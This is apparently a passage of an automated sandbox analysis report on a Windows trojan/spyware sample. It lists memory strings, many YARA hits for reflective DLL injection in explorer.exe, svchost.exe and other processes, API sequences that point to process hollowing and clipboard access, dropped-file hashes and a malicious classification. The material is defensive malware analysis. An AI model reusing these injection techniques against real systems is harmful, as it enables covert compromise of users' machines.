              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: explorer.exe, 00000005.00000002.2677506416.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: explorer.exe, 00000005.00000002.2681284481.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1612568383.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
              Source: 21AB.tmp.zx.exe, 0000000D.00000003.1623836872.0000021343B66000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000002.1630972120.00000213459D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
              Source: explorer.exe, 00000005.00000000.1434367193.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2687597599.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFB84B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_0DFB84B0
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFB86A0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0DFB86A0
              Source: C:\Windows\explorer.exe Code function: 5_2_0E1186A0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0E1186A0
              Source: C:\Windows\explorer.exe Code function: 5_2_0FF586A0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0FF586A0

              System Summary

              Source: 5.0.explorer.exe.e100000.5.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.8220535.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.e080535.5.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.c1b2c20.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.ff40000.7.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.c166810.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.e100000.6.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.dfa0000.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.3.explorer.exe.c166810.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.c1b2c20.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.3.explorer.exe.c1b2c20.4.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.dfa0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.dfa0000.3.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 4.3.msiexec.exe.21e1f7d9930.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.ded0535.2.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 3.2.svchost.exe.1f00d07e000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.e080535.5.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.e080535.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 2.3.audiodg.exe.1a265740d60.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.3.explorer.exe.c1b2c20.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 3.2.svchost.exe.1f00d07e000.0.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.e080535.4.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.ded0535.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.dfa0000.4.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.3.explorer.exe.c1b2c20.2.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 2.3.audiodg.exe.1a265740d60.0.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.c1b2c20.2.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.ded0535.3.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.3.explorer.exe.c166810.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.ff40000.7.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.e100000.6.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.e100000.5.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.ded0535.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.3.explorer.exe.c1b2c20.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.8220535.0.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.c1b2c20.1.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 4.3.msiexec.exe.21e1f7d9930.0.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.c166810.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000005.00000000.1435821747.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000005.00000000.1436005236.000000000E100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000003.00000002.2672467655.000001F00D07E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe, Code function: 0_2_00007FF7E83C24CC GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree
              Source: C:\Windows\explorer.exe, Code function: 5_2_0DFD0470 RtlCaptureContext,NtQueryInformationProcess
              Source: C:\Windows\explorer.exe, Code function: 5_2_0DFA1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free
              Source: C:\Windows\explorer.exe, Code function: 5_2_0E130470 RtlCaptureContext,NtQueryInformationProcess
              Source: C:\Windows\explorer.exe, Code function: 5_2_0E101370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free
              Source: C:\Windows\explorer.exe, Code function: 5_2_0FF70470 RtlCaptureContext,NtQueryInformationProcess
              Source: C:\Windows\explorer.exe, Code function: 5_2_0FF41370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe, Code function: 7_2_00007FF6C5DB24CC GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree
              Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe 50F3AF8A4B14A6E63CDC7817ECB482D7045458B43D786D580B51E8F12D762106
              Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe 94D7D12AE53CE97F38D8890383C2317CE03D45BD6ECAF0E0B9165C7066CD300C
              Source: C:\Windows\System32\svchost.exe, Code function: String function: 00007FF67E6D14EC appears 106 times
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe, Code function: String function: 00007FF7E83C14EC appears 106 times
              Source: C:\Windows\System32\msiexec.exe, Code function: String function: 00007FF6345C14EC appears 106 times
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe, Code function: String function: 00007FF7F24F25F0 appears 100 times
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe, Code function: String function: 00007FF7F24F2760 appears 36 times
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe, Code function: String function: 00007FF6C5DB14EC appears 106 times
              Source: C:\Windows\System32\audiodg.exe, Code function: String function: 00007FF6EC8414EC appears 106 times
              Source: api-ms-win-core-file-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-memory-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-stdio-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-debug-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-handle-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-2-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-sysinfo-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-filesystem-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-heap-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-rtlsupport-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-errorhandling-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-1.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-heap-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-processenvironment-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-2-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-namedpipe-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-timezone-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-datetime-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-interlocked-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-conio-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-libraryloader-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-time-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-process-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-runtime-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-math-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-string-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-string-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-utility-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-profile-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-localization-l1-2-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-util-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-console-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l2-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-locale-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-environment-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-convert-l1-1-0.dll.12.dr, Static PE information: No import functions for PE file found
              Source: uFVgJVXaEU.exe Binary or memory string: OriginalFilename vs uFVgJVXaEU.exe
              Source: uFVgJVXaEU.exe, 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameServices.exe2 vs uFVgJVXaEU.exe
              Source: uFVgJVXaEU.exe, 00000000.00000003.1412719401.0000000002E70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameServices.exe2 vs uFVgJVXaEU.exe
              Source: uFVgJVXaEU.exe, 00000000.00000003.1412262297.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameServices.exe2 vs uFVgJVXaEU.exe
              Source: uFVgJVXaEU.exe, 00000000.00000003.1412210285.0000000002E70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameServices.exe2 vs uFVgJVXaEU.exe
              Source: uFVgJVXaEU.exe Binary or memory string: OriginalFilenameServices.exe2 vs uFVgJVXaEU.exe
              Source: 5.0.explorer.exe.e100000.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.8220535.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.e080535.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.c1b2c20.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.ff40000.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.c166810.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.e100000.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.dfa0000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.3.explorer.exe.c166810.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.c1b2c20.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.3.explorer.exe.c1b2c20.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.dfa0000.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.dfa0000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 4.3.msiexec.exe.21e1f7d9930.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.ded0535.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 3.2.svchost.exe.1f00d07e000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.e080535.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.e080535.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 2.3.audiodg.exe.1a265740d60.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.3.explorer.exe.c1b2c20.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 3.2.svchost.exe.1f00d07e000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.e080535.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.ded0535.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.dfa0000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.3.explorer.exe.c1b2c20.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 2.3.audiodg.exe.1a265740d60.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.c1b2c20.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.ded0535.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.3.explorer.exe.c166810.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.ff40000.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.e100000.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.e100000.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.ded0535.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.3.explorer.exe.c1b2c20.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.8220535.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.c1b2c20.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 4.3.msiexec.exe.21e1f7d9930.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.c166810.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000005.00000000.1435821747.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000005.00000000.1436005236.000000000E100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000003.00000002.2672467655.000001F00D07E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@29/57@0/1
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Code function: 12_2_00007FF7F24F29E0 GetLastError,FormatMessageW,MessageBoxW,12_2_00007FF7F24F29E0
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Code function: 0_2_00007FF7E83C40A4 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_00007FF7E83C40A4
              Source: C:\Windows\System32\svchost.exe Code function: 3_2_00007FF67E6D40A4 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,3_2_00007FF67E6D40A4
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFA2EE0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,OpenProcess,CloseHandle,5_2_0DFA2EE0
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD0008 AdjustTokenPrivileges,5_2_0DFD0008
